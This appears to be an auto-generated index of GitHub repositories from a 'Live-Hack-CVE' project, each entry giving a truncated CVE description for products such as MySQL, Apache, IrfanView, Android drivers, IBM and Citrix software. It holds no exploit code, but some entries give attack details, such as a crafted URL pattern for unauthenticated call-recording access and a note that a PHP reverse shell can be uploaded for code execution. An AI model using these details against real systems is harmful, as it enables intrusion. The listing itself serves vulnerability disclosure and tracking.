**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3812](https://github.com/Live-Hack-CVE/CVE-2013-3812) create time: 2022-12-29T18:08:50Z

**The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3470](https://github.com/Live-Hack-CVE/CVE-2014-3470) create time: 2022-12-29T18:09:40Z

**Unspecified vulnerability in Oracle MySQL Server 5.6.19 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:MEMCACHED. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6474](https://github.com/Live-Hack-CVE/CVE-2014-6474) create time: 2022-12-29T18:09:29Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier, and 5.6.21 and earlier, allows remote authenticated users to affect availability via vectors related to Server : InnoDB : DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6568](https://github.com/Live-Hack-CVE/CVE-2014-6568) create time: 2022-12-29T18:09:26Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0437](https://github.com/Live-Hack-CVE/CVE-2014-0437) create time: 2022-12-29T18:09:22Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Replication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2438](https://github.com/Live-Hack-CVE/CVE-2014-2438) create time: 2022-12-29T18:09:19Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote authenticated users to affect availability via unknown vectors related to Performance Schema. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2430](https://github.com/Live-Hack-CVE/CVE-2014-2430) create time: 2022-12-29T18:08:54Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier, and 5.6.23 and earlier, allows remote authenticated users to affect availability via vectors related to DDL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0505](https://github.com/Live-Hack-CVE/CVE-2015-0505) create time: 2022-12-29T18:09:37Z

**pcregrep in PCRE before 8.38 mishandles the -q option for binary files, which might allow remote attackers to obtain sensitive information via a crafted file, as demonstrated by a CGI script that sends stdout data to a client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8393](https://github.com/Live-Hack-CVE/CVE-2015-8393) create time: 2022-12-29T18:08:47Z

**An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. Improper access validation allows a logged in user to shutdown or reboot devices in his account without having corresponding permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12527](https://github.com/Live-Hack-CVE/CVE-2020-12527) create time: 2022-12-29T18:15:24Z

**Incorrect Access Control issue in Yellowfin Business Intelligence 7.3 allows remote attackers to escalate privilege via MIAdminStyles.i4 Admin UI. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19586](https://github.com/Live-Hack-CVE/CVE-2020-19586) create time: 2022-12-29T18:07:06Z

**Cross Site Scripting (XSS) vulnerability in configMap parameters in Yellowfin Business Intelligence 7.3 allows remote attackers to run arbitrary code via MIAdminStyles.i4 Admin UI. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19587](https://github.com/Live-Hack-CVE/CVE-2020-19587) create time: 2022-12-29T17:35:58Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e30. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23551](https://github.com/Live-Hack-CVE/CVE-2020-23551) create time: 2022-12-29T17:28:25Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e82. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23550](https://github.com/Live-Hack-CVE/CVE-2020-23550) create time: 2022-12-29T17:28:21Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007d33. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23553](https://github.com/Live-Hack-CVE/CVE-2020-23553) create time: 2022-12-29T17:26:14Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e62. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23552](https://github.com/Live-Hack-CVE/CVE-2020-23552) create time: 2022-12-29T17:26:10Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e20. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23554](https://github.com/Live-Hack-CVE/CVE-2020-23554) create time: 2022-12-29T17:26:07Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e6e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23555](https://github.com/Live-Hack-CVE/CVE-2020-23555) create time: 2022-12-29T17:26:03Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x000000000001bcab. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23560](https://github.com/Live-Hack-CVE/CVE-2020-23560) create time: 2022-12-29T17:25:58Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000007d7f. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23559](https://github.com/Live-Hack-CVE/CVE-2020-23559) create time: 2022-12-29T17:25:54Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x000000000000755d. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23557](https://github.com/Live-Hack-CVE/CVE-2020-23557) create time: 2022-12-29T17:25:51Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e28. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23556](https://github.com/Live-Hack-CVE/CVE-2020-23556) create time: 2022-12-29T17:25:40Z

**IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000007f4b. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23558](https://github.com/Live-Hack-CVE/CVE-2020-23558) create time: 2022-12-29T17:25:36Z

**An issue was discovered in AnyDesk before 6.2.6 and 6.3.x before 6.3.3. An unnecessarily open listening port on a machine in the LAN of an attacker, opened by the Anydesk Windows client when using the tunneling feature, allows the attacker unauthorized access to the local machine's AnyDesk tunneling protocol stack (and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44425](https://github.com/Live-Hack-CVE/CVE-2021-44425) create time: 2022-12-29T18:14:58Z

**An issue was discovered in AnyDesk before 6.2.6 and 6.3.x before 6.3.5. An upload of an arbitrary file to a victim's local ~/Downloads/ directory is possible if the victim is using the AnyDesk Windows client to connect to a remote machine, if an attacker is also connected remotely with AnyDesk to the same remote machin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44426](https://github.com/Live-Hack-CVE/CVE-2021-44426) create time: 2022-12-29T18:14:54Z

**In PVRSRVRGXSubmitTransferKM of rgxtransfer.c, there is a possible user after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-238918403 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0697](https://github.com/Live-Hack-CVE/CVE-2021-0697) create time: 2022-12-29T18:11:29Z

**In PVRSRVBridgePMRPDumpSymbolicAddr of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.P CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0871](https://github.com/Live-Hack-CVE/CVE-2021-0871) create time: 2022-12-29T18:11:22Z

**The path in this case is a little bit convoluted. The end result is that via an ioctl an untrusted app can control the ui32PageIndex offset in the expression:sPA.uiAddr = page_to_phys(psOSPageArrayData->pagearray[ui32PageIndex]);With the current PoC this crashes as an OOB read. However, given that the OOB read value is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0942](https://github.com/Live-Hack-CVE/CVE-2021-0942) create time: 2022-12-29T18:11:15Z

**In MMU_MapPages of TBD, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-238916921 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0943](https://github.com/Live-Hack-CVE/CVE-2021-0943) create time: 2022-12-29T18:10:59Z

**IBM Maximo Asset Management 7.6.1.1 and 7.6.1.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 210163. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38924](https://github.com/Live-Hack-CVE/CVE-2021-38924) create time: 2022-12-29T17:35:55Z

**HotelDruid Hotel Management Software v3.0.3 and below was discovered to have exposed session tokens in multiple links via GET parameters, allowing attackers to access user session id's. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42948](https://github.com/Live-Hack-CVE/CVE-2021-42948) create time: 2022-12-29T17:35:47Z

**The component controlla_login function in HotelDruid Hotel Management Software v3.0.3 generates a predictable session token, allowing attackers to bypass authentication via bruteforce attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42949](https://github.com/Live-Hack-CVE/CVE-2021-42949) create time: 2022-12-29T17:34:45Z

**An issue was discovered in CrushFTP 9. The creation of a new user through the /WebInterface/UserManager/ interface allows an attacker, with access to the administration panel, to perform Stored Cross-Site Scripting (XSS). The payload can be executed in multiple scenarios, for example when the user's page appears in the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44076](https://github.com/Live-Hack-CVE/CVE-2021-44076) create time: 2022-12-29T17:32:44Z

**ntfsck in NTFS-3G through 2021.8.22 has a heap-based buffer overflow involving buffer+512*3-2. NOTE: the upstream position is that ntfsck is deprecated; however, it is shipped by some Linux distributions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46790](https://github.com/Live-Hack-CVE/CVE-2021-46790) create time: 2022-12-29T17:29:16Z

**The package postcss before 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s* sourceMappingURL=(.*). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23382](https://github.com/Live-Hack-CVE/CVE-2021-23382) create time: 2022-12-29T17:29:01Z

**A vulnerability was found in mod_wsgi. The X-Client-IP header is not removed from a request from an untrusted proxy, allowing an attacker to pass the X-Client-IP header to the target WSGI application because the condition to remove it is missing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2255](https://github.com/Live-Hack-CVE/CVE-2022-2255) create time: 2022-12-29T18:18:17Z

**Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where supplementary groups are not set up properly. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36109](https://github.com/Live-Hack-CVE/CVE-2022-36109) create time: 2022-12-29T18:18:14Z

**This affects the package com.diffplug.gradle:goomph before 3.37.2. It allows a malicious zip file to potentially break out of the expected destination directory, writing contents into arbitrary locations on the file system. Overwriting certain files/directories could allow an attacker to achieve remote code execution o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26049](https://github.com/Live-Hack-CVE/CVE-2022-26049) create time: 2022-12-29T18:18:10Z

**PROSCEND - PROSCEND / ADVICE .Ltd - G/5G Industrial Cellular Router (with GPS)4 Unauthenticated OS Command Injection Proscend M330-w / M33-W5 / M350-5G / M350-W5G / M350-6 / M350-W6 / M301-G / M301-GW ADVICE ICR 111WG / https://www.proscend.com/en/category/industrial-Cellular-Router/industrial-Cellular-Router.html http CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36779](https://github.com/Live-Hack-CVE/CVE-2022-36779) create time: 2022-12-29T18:18:07Z

**Avdor CIS - crystal quality Credentials Management Errors. The product is phone call recorder, you can hear all the recorded calls without authenticate to the system. Attacker sends crafted URL to the system: ip:port//V=2;ChannellD=number;Ext=number;Command=startLM;Client=number;Request=number;R=number number - id of t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36780](https://github.com/Live-Hack-CVE/CVE-2022-36780) create time: 2022-12-29T18:18:03Z

**In NLnet Labs Routinator 0.9.0 up to and including 0.11.2, due to a mistake in error handling, data in RRDP snapshot and delta files that isn’t correctly base 64 encoded is treated as a fatal error and causes Routinator to exit. Worst case impact of this vulnerability is denial of service for the RPKI data that Routi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3029](https://github.com/Live-Hack-CVE/CVE-2022-3029) create time: 2022-12-29T18:17:59Z

**Talos Linux is a Linux distribution built for Kubernetes deployments. Talos worker nodes use a join token to get accepted into the Talos cluster. Due to improper validation of the request while signing a worker node CSR (certificate signing request) Talos control plane node might issue Talos API certificate which allow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36103](https://github.com/Live-Hack-CVE/CVE-2022-36103) create time: 2022-12-29T18:17:55Z

**The typo3/html-sanitizer package is an HTML sanitizer, written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values. Due to a parsing issue in the upstream package `masterminds/html5`, malicious markup used in a sequence with special HTML comments cannot be filtered and sani CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36020](https://github.com/Live-Hack-CVE/CVE-2022-36020) create time: 2022-12-29T18:17:52Z

**matrix-appservice-irc is an open source Node.js IRC bridge for Matrix. Attackers can specify a specific string of characters, which would confuse the bridge into combining an attacker-owned channel and an existing channel, allowing them to grant themselves permissions in the channel. The vulnerability has been patched CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39203](https://github.com/Live-Hack-CVE/CVE-2022-39203) create time: 2022-12-29T18:17:48Z

**Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40635](https://github.com/Live-Hack-CVE/CVE-2022-40635) create time: 2022-12-29T18:17:44Z

**Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40634](https://github.com/Live-Hack-CVE/CVE-2022-40634) create time: 2022-12-29T18:17:21Z

**Summary:Product: AndroidVersions: Android SoCAndroid ID: A-238227323 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20388](https://github.com/Live-Hack-CVE/CVE-2022-20388) create time: 2022-12-29T18:17:18Z

**Summary:Product: AndroidVersions: Android SoCAndroid ID: A-238227324 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20387](https://github.com/Live-Hack-CVE/CVE-2022-20387) create time: 2022-12-29T18:17:14Z

**Summary:Product: AndroidVersions: Android SoCAndroid ID: A-238227328 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20386](https://github.com/Live-Hack-CVE/CVE-2022-20386) create time: 2022-12-29T18:17:11Z

**Summary:Product: AndroidVersions: Android SoCAndroid ID: A-238257000 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20391](https://github.com/Live-Hack-CVE/CVE-2022-20391) create time: 2022-12-29T18:17:07Z

**Summary:Product: AndroidVersions: Android SoCAndroid ID: A-238257004 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20389](https://github.com/Live-Hack-CVE/CVE-2022-20389) create time: 2022-12-29T18:17:03Z

**Summary:Product: AndroidVersions: Android SoCAndroid ID: A-238257002 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20390](https://github.com/Live-Hack-CVE/CVE-2022-20390) create time: 2022-12-29T18:16:58Z

**IBM Control Desk 7.6.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22329](https://github.com/Live-Hack-CVE/CVE-2022-22329) create time: 2022-12-29T18:16:55Z

**IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to an information disclosure in some scenarios due to unauthorized access caused by improper privilege management when CREATE OR REPLACE command is used. IBM X-Force ID: 225979. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22483](https://github.com/Live-Hack-CVE/CVE-2022-22483) create time: 2022-12-29T18:16:51Z

**IBM Control Desk 7.6.1 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 219126. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22330](https://github.com/Live-Hack-CVE/CVE-2022-22330) create time: 2022-12-29T18:16:47Z

**IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to obtain root privileges. IBM X-Force ID: 230502. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34356](https://github.com/Live-Hack-CVE/CVE-2022-34356) create time: 2022-12-29T18:16:44Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 229714. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34336](https://github.com/Live-Hack-CVE/CVE-2022-34336) create time: 2022-12-29T18:16:40Z

**IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to obtain root privileges. IBM X-Force ID: 232014. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36768](https://github.com/Live-Hack-CVE/CVE-2022-36768) create time: 2022-12-29T18:16:36Z

**IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a denial of service after entering a malformed SQL statement into the Db2expln tool. IBM X-Force ID: 230823. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35637](https://github.com/Live-Hack-CVE/CVE-2022-35637) create time: 2022-12-29T18:16:33Z

**Hospital Management System v1.0 was discovered to contain multiple SQL injection vulnerabilities via the Username and Password parameters on the Login page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38637](https://github.com/Live-Hack-CVE/CVE-2022-38637) create time: 2022-12-29T18:16:29Z

**Server-Side Request Forgery (SSRF) in GitHub repository ionicabizau/parse-url prior to 8.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2900](https://github.com/Live-Hack-CVE/CVE-2022-2900) create time: 2022-12-29T18:16:25Z

**Garage Management System 1.0 is vulnerable to the Remote Code Execution (RCE) due to the lack of filtering from the file upload function. The vulnerability exist during adding parts and from the upload function, the attacker can upload PHP Reverse Shell straight away to gain RCE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36667](https://github.com/Live-Hack-CVE/CVE-2022-36667) create time: 2022-12-29T18:16:22Z

**OSU Open Source Lab VNCAuthProxy through 1.1.1 is affected by an vncap/vnc/protocol.py VNCServerAuthenticator authentication-bypass vulnerability that could allow a malicious actor to gain unauthorized access to a VNC session or to disconnect a legitimate user from a VNC session. A remote attacker with network access t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36436](https://github.com/Live-Hack-CVE/CVE-2022-36436) create time: 2022-12-29T18:16:18Z

**Garage Management System 1.0 is vulnerable to Stored Cross Site Scripting (XSS) on several parameters. The vulnerabilities exist during creating or editing the parts under parameters. Using the XSS payload, the Stored XSS triggered and can be used for further attack vector. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36668](https://github.com/Live-Hack-CVE/CVE-2022-36668) create time: 2022-12-29T18:16:15Z

**PayMoney 3.3 is vulnerable to Client Side Remote Code Execution (RCE). The vulnerability exists on the reply ticket function and upload the malicious file. A calculator will open when the victim who download the file open the RTF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37140](https://github.com/Live-Hack-CVE/CVE-2022-37140) create time: 2022-12-29T18:15:45Z

**The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-2364](https://github.com/Live-Hack-CVE/CVE-2008-2364) create time: 2022-12-29T16:53:08Z

**The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-3094](https://github.com/Live-Hack-CVE/CVE-2009-3094) create time: 2022-12-29T16:53:59Z

**The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-3095](https://github.com/Live-Hack-CVE/CVE-2009-3095) create time: 2022-12-29T16:53:22Z

**The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecifi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-2699](https://github.com/Live-Hack-CVE/CVE-2009-2699) create time: 2022-12-29T16:53:19Z

**The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-1891](https://github.com/Live-Hack-CVE/CVE-2009-1891) create time: 2022-12-29T16:53:15Z

**The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-1890](https://github.com/Live-Hack-CVE/CVE-2009-1890) create time: 2022-12-29T16:53:12Z

**The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-0434](https://github.com/Live-Hack-CVE/CVE-2010-0434) create time: 2022-12-29T16:54:06Z

**Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-0419](https://github.com/Live-Hack-CVE/CVE-2011-0419) create time: 2022-12-29T16:54:02Z

**The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CV CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-3192](https://github.com/Live-Hack-CVE/CVE-2011-3192) create time: 2022-12-29T16:53:55Z

**The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-3348](https://github.com/Live-Hack-CVE/CVE-2011-3348) create time: 2022-12-29T16:53:52Z

**The svc_dg_getargs function in libtirpc 0.2.3 and earlier allows remote attackers to cause a denial of service (rpcbind crash) via a Sun RPC request with crafted arguments that trigger a free of an invalid pointer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1950](https://github.com/Live-Hack-CVE/CVE-2013-1950) create time: 2022-12-29T16:46:50Z

**An issue was discovered in Airties Smart Wi-Fi before 2020-08-04. It allows attackers to change the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure Direct Object Reference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38789](https://github.com/Live-Hack-CVE/CVE-2022-38789) create time: 2022-12-29T16:50:57Z

**A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3452](https://github.com/Live-Hack-CVE/CVE-2020-3452) create time: 2022-12-29T16:45:54Z

**The Windows Logon installer prior to 4.1.2 did not properly validate file installation paths. This allows an attacker with local user privileges to coerce the installer to write to arbitrary privileged directories. If successful, an attacker can manipulate files used by Windows Logon, cause Denial of Service (DoS) by d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3427](https://github.com/Live-Hack-CVE/CVE-2020-3427) create time: 2022-12-29T16:45:51Z

**The HoYoVerse (formerly miHoYo) Genshin Impact mhyprot2.sys 1.0.0.0 anti-cheat driver does not adequately restrict unprivileged function calls, allowing local, unprivileged users to execute arbitrary code with SYSTEM privileges on Microsoft Windows systems. The mhyprot2.sys driver must first be installed by a user with CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36603](https://github.com/Live-Hack-CVE/CVE-2020-36603) create time: 2022-12-29T16:45:47Z

**Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malform CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9060](https://github.com/Live-Hack-CVE/CVE-2020-9060) create time: 2022-12-29T16:43:58Z

**Z-Wave devices based on Silicon Labs 500 series chipsets using S0 authentication are susceptible to uncontrolled resource consumption leading to battery exhaustion. As an example, the Schlage BE468 version 3.42 door lock is vulnerable and fails open at a low battery level. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9059](https://github.com/Live-Hack-CVE/CVE-2020-9059) create time: 2022-12-29T16:43:54Z

**The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachabl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8558](https://github.com/Live-Hack-CVE/CVE-2020-8558) create time: 2022-12-29T16:43:51Z

**Parallels Remote Application Server (RAS) allows a local attacker to retrieve certain profile password in clear text format by uploading a previously stored cyphered file by Parallels RAS. The confidentiality, availability and integrity of the information of the user could be compromised if an attacker is able to recov CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8968](https://github.com/Live-Hack-CVE/CVE-2020-8968) create time: 2022-12-29T16:43:47Z

**Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8195](https://github.com/Live-Hack-CVE/CVE-2020-8195) create time: 2022-12-29T16:43:44Z

**Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8196](https://github.com/Live-Hack-CVE/CVE-2020-8196) create time: 2022-12-29T16:43:40Z

